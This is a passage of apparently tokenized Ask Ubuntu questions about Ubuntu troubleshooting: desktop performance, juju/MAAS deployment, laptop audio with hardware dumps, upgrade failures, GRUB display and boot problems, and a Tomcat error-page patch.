powerful system that is running this same version of ubuntu ( installed from scratch ) better than this . things are a little slow on that machine but acceptably so . this is not acceptable , an order of magnitude worse performing . i suspect a graphics mismatch somewhere or something like that . it 's only when it does all that transparency fade-in business ( which i could live without , i admit ) that i notice the slowness . since i have this other computer running all my critical stuff for the time being i 'm willing to spend a little time trying to get to the bottom of this one . but i 'm not sure how . can anyone help or point me to a source where folks knowledgeable in the nitty gritty of unity are available ? thanks . if not , my only options will be to reinstall from scratch or to find another distro . i do n't want to do that , i 've been happy with ubuntu for six years or more , but if the sizzle is going to overwhelm the steak , it 's not good . looking for the best path forward .
364332	juju/maas in vsphere to test openstack	i have the below setup in my lab vsphere to test openstack deployment with juju . maas server vm have 2 interfaces [ one have internet access using proxy and another internal 192.168 n/w for dhcp and dns ] ( raring release ) maas nodes have one interface in 192.168 n/w . ( quantal release ) have a local mirror of quantal for maas node to pxe boot . i am able bootstrap my juju environment and one node under maas server got allocated for that . because wol is not available in vsphere vms , i booted that specific vm ( node3.juju.local ) manually . after the pxe boot is completed . my observations not able to get the juju status in maas server . getting stuck here 2013-10-22 06:18:27 info juju.state open.go:68 opening state ; mongo addresses : [ `` node3.juju.local :37017 '' ] ; entity `` '' so i logged into the node3.juju.local machine . last few lines of /var/log/cloud-init-output.log 2013-10-21 13:04:56 debug juju.state open.go:88 connection failed , will retry : dial tcp 127.0.0.1:37017 : connection refused 2013-10-21 13:04:57 debug juju.state open.go:88 connection failed , will retry : dial tcp 127.0.0.1:37017 : connection refused 2013-10-21 13:04:57 error juju.agent agent.go:470 failed to initialize state : no reachable servers 2013-10-21 13:04:57 error juju supercommand.go:282 no reachable servers *2013-10-21 13:04:57,960 - util.py [ warning ] : failed running /var/lib/cloud/instance/scripts/runcmd [ 1 ] 2013-10-21 13:04:57,962 - cc_scripts_user.py [ warning ] : failed to run module scripts-user ( scripts in /var/lib/cloud/instance/scripts ) * 2013-10-21 13:04:57,963 - util.py [ warning ] : running scripts-user ( ) failed cloud-init v. 0.7 finished at mon , 21 oct 2013 13:04:57 +0000 . datasource datasourcemaas [ http : //192.168.124.10/maas/metadata/ ] . up 1532.83 seconds cloud-init v. 0.7 running 'init-local ' at mon , 21 oct 2013 15:53:08 +0000 . up 3.88 seconds . it is clear mongodb is not started i checked that by going through runcmd ( cloud-init ) script and cloud-init-output.log mongod version installed 2.0.6 and mongod did n't have below options ssl options : -- sslonnormalports use ssl on configured ports -- sslpemkeyfile arg pem file for ssl -- sslpemkeypassword arg pem file password which is mentioned in runcmd script ( cloud-init ) *exec /usr/bin/mongod -- auth -- dbpath=/var/lib/juju/db -- sslonnormalports -- sslpemkeyfile '/var/lib/juju/server.pem ' -- sslpemkeypassword ignored -- bind_ip 0.0.0.0 -- port 37017 -- noprealloc -- syslog -- smallfiles* what could be the problem ? whether maas node not having internet access is the problem ? my raring juju+lxc setup works fine so i copied the required mongo binaries from that machine to node3.juju.local machine and rebooted the server this time mongod started but the juju status did n't give the below error ( dns , nslookup all are proper ) 2013-10-22 06:18:27 info juju.state open.go:68 opening state ; mongo addresses : [ `` node3.juju.local :37017 '' ] ; entity `` '' 2013-10-22 06:28:27 error juju supercommand.go:282 unable to connect to environment `` maas '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no reachable servers
364334	headphones not working in 13.10 after update on my aw m17x	my headphones is not work on my alienware m17x after recent update from 13.04 to 13.10 . in the sound window no headphones option . h/w path device class description system m17xr4 ( xxx123x # aba ) /0 bus m17xr4 /0/0 memory 128kib bios /0/4 processor intel ( r ) core ( tm ) i7-3630qm cpu @ 2 . /0/4/b memory 32kib l1 cache /0/4/c memory 256kib l2 cache /0/4/d memory 6mib l3 cache /0/a memory 32kib l1 cache /0/2e memory 16gib system memory /0/2e/0 memory 8gib sodimm ddr3 synchronous 1600 mh /0/2e/1 memory 4gib sodimm ddr3 synchronous 1600 mh /0/2e/2 memory dimm [ empty ] /0/2e/3 memory 4gib sodimm ddr3 synchronous 1600 mh /0/100 bridge 3rd gen core processor dram controll /0/100/1 bridge xeon e3-1200 v2/3rd gen core process /0/100/1/0 generic illegal vendor id /0/100/2 display 3rd gen core processor graphics cont /0/100/14 bus 7 series/c210 series chipset family /0/100/16 communication 7 series/c210 series chipset family /0/100/1a bus 7 series/c210 series chipset family /0/100/1b multimedia 7 series/c210 series chipset family /0/100/1c bridge 7 series/c210 series chipset family /0/100/1c/0 eth0 network ar8151 v2.0 gigabit ethernet /0/100/1c.2 bridge 7 series/c210 series chipset family /0/100/1c.2/0 wlan0 network centrino wireless-n 2230 /0/100/1c.3 bridge 7 series/c210 series chipset family /0/100/1c.3/0 generic rts5209 pci express card reader /0/100/1c.3/0.1 generic rts5209 pci express card reader /0/100/1d bus 7 series/c210 series chipset family /0/100/1f bridge hm77 express chipset lpc controller /0/100/1f.2 storage 82801 mobile sata controller [ raid m /0/100/1f.3 bus 7 series/c210 series chipset family /0/1 scsi0 storage /0/1/0.0.0 /dev/sda disk 750gb wdc wd7500bpkt-7 /0/1/0.0.0/1 /dev/sda1 volume 111gib ext4 volume /0/1/0.0.0/2 /dev/sda2 volume 139gib ext4 volume /0/1/0.0.0/3 /dev/sda3 volume 200gib ext4 volume /0/2 scsi1 storage /0/2/0.0.0 /dev/sdb disk 128gb adata sp900 /0/2/0.0.0/1 /dev/sdb1 volume 46gib ext4 volume /0/2/0.0.0/2 /dev/sdb2 volume 70gib ext4 volume /0/2/0.0.0/3 /dev/sdb3 volume 1940mib windows fat volume /0/3 scsi2 storage /0/3/0.0.0 /dev/cdrom disk dvd+-rw ga31n /1 power dell 7xc9n34a total 0 crw-rw -- -- + 1 root audio 116 , 33 oct 23 19:15 timer crw-rw -- -- + 1 root audio 116 , 1 oct 23 19:15 seq crw-rw -- -- + 1 root audio 116 , 7 oct 23 19:15 pcmc0d4c crw-rw -- -- + 1 root audio 116 , 8 oct 23 19:15 pcmc0d2c crw-rw -- -- + 1 root audio 116 , 11 oct 23 19:15 hwc0d3 crw-rw -- -- + 1 root audio 116 , 12 oct 23 19:15 hwc0d0 crw-rw -- -- + 1 root audio 116 , 13 oct 23 19:15 controlc0 drwxr-xr-x 2 root root 60 oct 23 19:15 by-path drwxr-xr-x 3 root root 340 oct 23 19:15 . crw-rw -- -- + 1 root audio 116 , 4 oct 23 19:15 pcmc0d3p crw-rw -- -- + 1 root audio 116 , 3 oct 23 19:15 pcmc0d7p crw-rw -- -- + 1 root audio 116 , 2 oct 23 19:15 pcmc0d8p crw-rw -- -- + 1 root audio 116 , 10 oct 23 19:15 pcmc0d0c crw-rw -- -- + 1 root audio 116 , 6 oct 23 19:15 pcmc0d1c crw-rw -- -- + 1 root audio 116 , 5 oct 23 19:15 pcmc0d1p crw-rw -- -- + 1 root audio 116 , 9 oct 23 19:15 pcmc0d0p drwxr-xr-x 18 root root 4400 oct 23 19:27 .. cat : /dev/sndstat : no such file or directory 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 4 [ 8086:1e16 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 raid bus controller [ 0104 ] : intel corporation 82801 mobile sata controller [ raid mode ] [ 8086:282a ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf114m [ geforce gtx 675m ] [ 10de:1212 ] ( rev ff ) 07:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8151 v2.0 gigabit ethernet [ 1969:1083 ] ( rev c0 ) 08:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2230 [ 8086:0887 ] ( rev c4 ) 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) 09:00.1 sd host controller [ 0805 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) bus 002 device 003 : id 8087:07da intel corp . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 064e:8127 suyin corp . bus 001 device 003 : id 187c:0520 alienware corporation bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 003 : id 045e:00db microsoft corp. natural ergonomic keyboard 4000 v1.0 bus 003 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub /usr/sbin/alsactl specified filename /dev/dsp does not exist . user pid access command /dev/snd/controlc0 : marc 2215 f ... . pulseaudio dpkg-query : no path found matching pattern *bin/slmodemd* [ 0.000000 ] no agp bridge found [ 0.000000 ] no numa configuration found [ 0.000000 ] no agp bridge found [ 0.276252 ] acpi : no dock devices found . [ 0.551392 ] found 1 acpi root devices [ 0.625052 ] pnp : pnp acpi : found 12 devices [ 0.925105 ] audit : initializing netlink socket ( disabled ) [ 0.925118 ] type=2000 audit ( 1382526929.892:1 ) : initialized [ 1.166855 ] libphy : fixed mdio bus : probed [ 1.181054 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.181142 ] hub 1-0:1.0 : usb hub found [ 1.197064 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.197140 ] hub 2-0:1.0 : usb hub found [ 1.197473 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.197552 ] hub 3-0:1.0 : usb hub found [ 1.197841 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 1.197914 ] hub 4-0:1.0 : usb hub found [ 1.280570 ] bios edd facility v0.16 2004-jun-25 , 0 devices found [ 1.310358 ] sdhci-pci 0000:09:00.1 : sdhci controller found [ 10ec:5209 ] ( rev 1 ) [ 1.310415 ] mmc0 : no vqmmc regulator found [ 1.310417 ] mmc0 : no vmmc regulator found [ 1.625853 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.626223 ] hub 1-1:1.0 : usb hub found [ 1.870056 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.870423 ] hub 2-1:1.0 : usb hub found [ 2.056437 ] usb 3-2 : new usb device found , idvendor=046d , idproduct=c52b [ 2.259544 ] usb 3-4 : new usb device found , idvendor=045e , idproduct=00db [ 2.259747 ] usb 3-4 : ep 0x81 - rounding interval to 64 microframes , ep desc says 80 microframes [ 2.259751 ] usb 3-4 : ep 0x82 - rounding interval to 64 microframes , ep desc says 80 microframes [ 2.440036 ] usb 1-1.2 : new usb device found , idvendor=187c , idproduct=0520 [ 2.603299 ] usb 1-1.5 : new usb device found , idvendor=064e , idproduct=8127 [ 2.770904 ] usb 2-1.5 : new usb device found , idvendor=8087 , idproduct=07da [ 3.499617 ] lp : driver loaded but no devices found [ 3.595278 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 3.613259 ] iwlwifi 0000:08:00.0 : loaded firmware version 18.168.6.1 op_mode iwldvm [ 3.616435 ] type=1400 audit ( 1382526932.830:2 ) : apparmor= '' status '' operation= '' profile_load '' parent=430 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=450 comm= '' apparmor_parser '' [ 3.616443 ] type=1400 audit ( 1382526932.830:3 ) : apparmor= '' status '' operation= '' profile_load '' parent=430 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=450 comm= '' apparmor_parser '' [ 3.616447 ] type=1400 audit ( 1382526932.830:4 ) : apparmor= '' status '' operation= '' profile_load '' parent=430 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=450 comm= '' apparmor_parser '' [ 3.616940 ] type=1400 audit ( 1382526932.830:5 ) : apparmor= '' status '' operation= '' profile_replace '' parent=430 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=450 comm= '' apparmor_parser '' [ 3.616946 ] type=1400 audit ( 1382526932.830:6 ) : apparmor= '' status '' operation= '' profile_replace '' parent=430 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=450 comm= '' apparmor_parser '' [ 3.617217 ] type=1400 audit ( 1382526932.830:7 ) : apparmor= '' status '' operation= '' profile_replace '' parent=430 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=450 comm= '' apparmor_parser '' [ 3.637669 ] acpi warning : \_sb_.pci0.gfx0._dsm : argument # 4 type mismatch - found [ integer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 3.637708 ] acpi warning : \_sb_.pci0.gfx0._dsm : argument # 4 type mismatch - found [ integer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 3.637732 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ integer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 3.637758 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ integer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 3.689724 ] uvcvideo : found uvc 1.00 device laptop_integrated_webcam_fhd ( 064e:8127 ) [ 3.690283 ] uvcvideo : no streaming interface found for terminal 9 . [ 4.684258 ] [ firmware bug ] : acpi ( pegp ) defines _dod but not _dos [ 4.725161 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 4.839735 ] type=1400 audit ( 1382526934.050:8 ) : apparmor= '' status '' operation= '' profile_load '' parent=935 profile= '' unconfined '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=939 comm= '' apparmor_parser '' [ 4.839743 ] type=1400 audit ( 1382526934.050:9 ) : apparmor= '' status '' operation= '' profile_load '' parent=935 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=939 comm= '' apparmor_parser '' [ 4.840258 ] type=1400 audit ( 1382526934.054:10 ) : apparmor= '' status '' operation= '' profile_replace '' parent=935 profile= '' unconfined '' name= '' /usr/sbin/cupsd '' pid=939 comm= '' apparmor_parser '' [ 5.205584 ] init : alsa-restore main process ( 1100 ) terminated with status 19 [ 5.247699 ] vboxdrv : found 8 processor cores . [ 5.426860 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 5.426863 ] bbswitch : found discrete vga device 0000:01:00.0 : \_sb_.pci0.peg0.pegp [ 5.426873 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 5.428410 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) [ 5.454729 ] vboxpci : iommu not found ( not registered ) [ 5.566769 ] input : hda intel pch hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input11 [ 5.566845 ] input : hda intel pch hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input12 [ 5.566914 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 5.566976 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input14 [ 5.567036 ] input : hda intel pch line as /devices/pci0000:00/0000:00:1b.0/sound/card0/input15 [ 73.079705 ] wlan0 : direct probe to 4c : e6:76 : c4 : cc:0a ( try 1/3 ) [ 73.281180 ] wlan0 : direct probe to 4c : e6:76 : c4 : cc:0a ( try 2/3 ) [ 73.879883 ] wlan0 : direct probe to 4c : e6:76 : c4 : cc:0a ( try 3/3 ) [ 74.728337 ] wlan0 : direct probe to 4c : e6:76 : c4 : cc:0a ( try 1/3 ) [ 74.929821 ] wlan0 : direct probe to 4c : e6:76 : c4 : cc:0a ( try 2/3 ) [ 75.133855 ] wlan0 : direct probe to 4c : e6:76 : c4 : cc:0a ( try 3/3 ) sudo : /etc/init.d/sl-modem-daemon : command not found release date : 06/29/2012 manufacturer : alienware product name : m17xr4 serial number : bvprzw1 manufacturer : alienware product name : m17xr4 serial number : .bvprzw1.cn129612981009 . manufacturer : alienware serial number : bvprzw1 manufacturer : intel ( r ) corporation serial number : to be filled by o.e.m . option 1 : string1 for type12 equipment manufacturer option 2 : string2 for type12 equipment manufacturer option 3 : string3 for type12 equipment manufacturer option 4 : string4 for type12 equipment manufacturer manufacturer : a-data technology serial number : 000027ba manufacturer : hynix serial number : 42ba831e manufacturer : empty serial number : empty manufacturer : hynix serial number : 42aa8339 manufacturer : sdi sbds serial number : 0001 sbds manufacture date : 2009-01-01 snd_seq_dummy 12798 0 snd_hda_codec_hdmi 41070 1 snd_hda_codec_ca0132 36039 1 btusb 28267 0 bluetooth 371874 22 bnep , btusb , rfcomm snd_hda_intel 48171 3 snd_hda_codec 188852 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec_ca0132 snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 3 snd_seq_midi_event , snd_seq_dummy , snd_seq_midi snd_seq_device 14497 4 snd_seq , snd_rawmidi , snd_seq_dummy , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 18 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_dummy , snd_hda_codec_ca0132 , snd_seq_midi soundcore 12680 1 snd usbhid 53014 0 hid 101512 5 hid_generic , hid_microsoft , usbhid , hid_logitech_dj welcome to pulseaudio ! use `` help '' for usage information . > > > 1 sink ( s ) available . * index : 4 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 26 % 1 : 26 % 0 : -35.00 db 1 : -35.00 db balance 0.00 base volume : 71 % -9.00 db volume steps : 65537 muted : yes current latency : 0.00 ms max request : 0 kib max rewind : 0 kib monitor source : 5 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0.00 ms ; range is 0.50 .. 371.52 ms card : 0 < alsa_card.pci-0000_00_1b.0 > module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` ca0132 analog '' alsa.id = `` ca0132 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xc4710000 irq 47 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 1e20 '' device.product.name = `` 7 series/c210 series chipset family high definition audio controller '' device.form_factor = `` internal '' device.string = `` front:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` intel pantherpoint hdmi '' alsa.components = `` hda:11020011,1028057b,00100918 hda:80862806,1028057b,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : headphones ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : < analog-output-speaker > > > > **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : ca0132 analog [ ca0132 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 1 : ca0132 digital [ ca0132 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : pch [ hda intel pch ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 unloading alsa sound driver modules : snd-seq-dummy snd-hda-codec-hdmi snd-hda-codec-ca0132 snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-seq-midi snd-seq-midi-event snd-rawmidi snd-seq snd-seq-device snd-timer ( failed : modules still loaded : snd-hda-codec-hdmi snd-hda-codec-ca0132 snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-timer ) . loading alsa sound driver modules : snd-seq-dummy snd-hda-codec-hdmi snd-hda-codec-ca0132 snd-hda-intel snd-hda-codec snd-hwdep snd-pcm snd-page-alloc snd-seq-midi snd-seq-midi-event snd-rawmidi snd-seq snd-seq-device snd-timer . support status summary of 'xware ' : you have 2326 packages ( 88.5 % ) supported until july 2014 ( 9m ) you have 44 packages ( 1.7 % ) that can not/no-longer be downloaded you have 258 packages ( 9.8 % ) that are unsupported run with -- show-unsupported , -- show-supported or -- show-all to see more details *-multimedia description : audio device product : 7 series/c210 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:47 memory : c4710000-c4713fff
364335	how to remove gnome desktop environment ?	i had installed ubuntu-gnome-i386 in my laptop . it is working fine but i do n't need gnome environment anymore . how can i completely remove gnome desktop environment and get back my unity .
364341	what to do about unreadable grub screen	i have been upgrading my ubuntu , from 10.04 to 12.04 to 12.10 to 13.04 in the past few days with varying degrees of success . one problem that has been constant through every step of the upgrade , since 12.04 is that a portion of the text on the grub screen is off the screen to the left so i ca n't completely make out what the options are . as i am having other troubles with the upgrade i would like to at least be able to see what options there are to me at boot time . is there some sort of grub configuration that can handle this ?
364344	how to let ubuntu promt my password on the greeter screen instead of the keyring promt ?	i want to type my password on the greeter screen instead of the keyring promt , because this can simply be dismissed . please correct me if i 'm wrong , and sorry for the horrible english
364348	failed upgrade from 12.04 to 13.10	i tried updating my ubuntu today from 12.04 to 13.10 and am now unable to update anything and have what is basically a useless system . whenever i try to launch update manager i get not all updates can be installed , run a partial upgrade can not upgrade an upgrade from 'raring ' to 'precise ' is not supported with this tool . when i try things from terminal they 're no better . when trying apt-get update i get an w : failed to fetch gzip : /var/lib/apt/lists/partial/au.archive.ubuntu.com_ubuntu_dists_saucy_multiverse_i18n_translation-en encountered a section with no package : header e : some index files failed to download . they have been ignored , or old ones used instead . trying to run apt-get upgrade gives me you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libdrm2 : breaks : libdrm2 : i386 ( ! = 2.4.43-0ubuntu0.2 ) but 2.4.43-0ubuntu0.0.3 is installed libdrm2 : i386 : breaks : libdrm2 ( ! = 2.4.43-0ubuntu0.0.3 ) but 2.4.43-0ubuntu0.2 is installed e : unmet dependencies . try using -f. and trying apt-get -f install dpkg : error processing libdrm2 : i386 ( -- configure ) : libdrm2 : i386 2.4.43-0ubuntu0.0.3 can not be configured because libdrm2 : amd64 is in a different version ( 2.4.43-0ubuntu0.2 ) dpkg : error processing libdrm2 ( -- configure ) : libdrm2 : amd64 2.4.43-0ubuntu0.2 can not be configured because libdrm2 : i386 is in a different version ( 2.4.43-0ubuntu0.0.3 ) no apport report written because maxreports is reached already errors were encountered while processing : libdrm2 : i386 libdrm2
364349	how to install ubuntu on arm ?	i have 1 question . can i install ubuntu touch on my tablet go clever 974.2 rk3066 ? i want this so much . thank you for help .
364350	i ca n't download anything and i ca n't watch videos	two days ago i tried to download skype and it says an error occurred it says end of central directory signature not found either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/maria/downloads/skypesetup-aoc-jd.exe or /home/maria/downloads/skypesetup-aoc-jd.exe.zip , and can not find /home/maria/downloads/skypesetup-aoc-jd.exe.zip pe ... this happens whenever i try to download anything like games and also i ca n't watch videoss it 's looking for plug ins but it does n't find them i hate this
364352	sudo does not work in gui after upgrade to 13.10	on 2 completely different machines i have the same problem after upgrading from 13.04 to 13.10 : all programs/task requiering sudo permissions ( software updater , starting synaptic , installing programs , shutdown ) do not start / execute . no gksu ( or other ) window comes up . synaptic never shows , software updater pops up with a `` you are not allowed to perform this action '' message . all programs / task work when started from terminal with sudo , like `` sudo synaptics '' asks for my password , starts and works as expected . i am in the admin group which is liked in sudoers config ( verified with visudo and getent group admin ) . some link from gui to gksu ( or similar ) is broken .
364354	tomcat 7.0.26 in ubuntu 12.04 lts missing a security update ?	the default error pages in tomcat7 displays information about the hosting system . and before version 7.0.29 there was not much one could do about it ( unless using tomcat 5 or 6 ) . the way of hiding such information was to use custom error-handlers defined in context or webapp . in tomcat7 it was not possible ( beacuse of confusion regarding the servlet 3.0 spec ) , but it was reported as a bug https : //issues.apache.org/bugzilla/show_bug.cgi ? id=52135 and then fixed for version 7.0.29 . in my mind this is a security feature so why is n't the version on ubuntu 12.04 patched with this fix ?
364355	viewing a part of the screen in a window on linux	i plan to make a presentation with a live demo using my wide screen ubuntu 12.10 laptop and a projector . my plan is to connect the projector as a second ( small ) display and put my slides and live-demo there . it would be convenient , if i could see the projector display on my laptop lcd screen within a window ( no zoom or stretch needed ) . so my question is : how can i see selected part of a screen within a window ? thank you for your suggestions ! ps other possibilities are typing on laptop and looking on the projector screen and not at the audience cloning laptop display to the projector display : zooming/stretching wide screen to a small projector screen and also being unable to put some private ( like timer ) information on the laptop screen . original on unix & linux : http : //unix.stackexchange.com/q/97005/49672
364358	mysterious > prompt from missing right apostrophe	if i type for example grep 'needle > i get sent to a mysterious > prompt from which ctrl-c ( or restarting the terminal ) is seemingly the only escape . what is this prompt ? why does n't it terminate when i enter ctrl-z ? why is n't it better designed to detect trapped newbies ? sure , maybe in some ridiculously contrived edge case there would be a reason to open this > prompt and then input something like `` quit\nexit\nhelp\nctrl-z\nlogout\n '' , but if the user starts entering those things , ubuntu should at least issue a helpful response message ( e.g. , `` are you trying to get out of this prompt ? if so use ctrl-c . if not , ignore this message . '' ) that would n't interfere with whatever weird purpose the prompt serves .
364360	software-center cant run	i cant run software-center . error : traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 25 , in < module > from gi.repository import gtk , gobject importerror : no module named gi.repository
364361	high disk temperature only in ubuntu	under ubuntu my disk temperature is rising all the way up to 55 degrees . however on same laptop under windows 7 temperature remains around 44 degrees . my laptop config is hp pavilion dv6 - 2150us i3 first gen processor , 320 gb sata 7200 rpm disk . intel hd display . i am checking disk temperature with following command sudo hddtemp /dev/sda under linux laptop is really heating up badly while under windows it is running quite cool .
364362	grub rescue - the laptop wo n't boot	first of all i 'm italian , so i apologize for my bad english . second , i have a big problem . i have a new sony vaio pro 13 ( so , it 's an ultra-book without the cd drive ) , which had windows 8 pre installed . i needed to install ubuntu in dual boot for university purposes . so , i shrunk the windows partition and created a new partition , and from a boot-able usb stick i created a swap partition and an ext4 partition , and installed ubuntu . due to several failures , i used the boot-repair tool , which installed the grub 2 boot-loader , from which i could start ubuntu and windows . anyway ubuntu did n't start , it showed me an error , but this is not the problem . the problem is that , due to this error , i decided to try again ( because maybe i did something wrong ) , so i logged into windows and deleted the two linux partitions , creating an unallocated space , and rebooted with the usb stick . but i got stuck in the `` grub rescue '' . i looked in the internet , but i found nothing , because the booting order is first the ssd drive and second the usb stick ( wheni installed ubuntu before , i loaded the usb stick from a sony uefi-like menu , which had 4 options , and one of them was `` boot fom usb '' ) ; i do 